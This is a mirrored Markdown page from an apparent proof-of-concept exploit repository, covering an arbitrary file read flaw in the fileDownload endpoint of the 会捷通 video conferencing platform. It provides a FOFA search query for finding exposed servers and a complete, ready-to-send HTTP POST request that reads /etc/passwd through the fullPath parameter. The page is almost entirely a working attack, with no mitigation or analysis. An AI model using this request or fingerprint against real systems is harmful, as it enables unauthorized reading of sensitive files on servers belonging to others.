mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
27 lines
732 B
Markdown
27 lines
732 B
Markdown
|
|
## 会捷通云视讯平台fileDownload存在任意文件读取漏洞
|
||
|
|
|
||
|
|
## fofa
|
||
|
|
|
||
|
|
```
|
||
|
|
body="/him/api/rest/v1.0/node/role"
|
||
|
|
```
|
||
|
|
|
||
|
|
## poc
|
||
|
|
|
||
|
|
```
|
||
|
|
POST /fileDownload?action=downloadBackupFile HTTP/1.1
|
||
|
|
Host: x.x.x.x
|
||
|
|
Content-Length: 20
|
||
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Edg/89.0.774.57
|
||
|
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||
|
|
Accept: */*
|
||
|
|
Origin: http://x.x.x.x
|
||
|
|
Referer: http://x.x.x.x
|
||
|
|
Accept-Encoding: gzip, deflate
|
||
|
|
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,pl;q=0.5
|
||
|
|
Connection: close
|
||
|
|
|
||
|
|
fullPath=/etc/passwd
|
||
|
|
```
|
||
|
|
|
||
|
|

|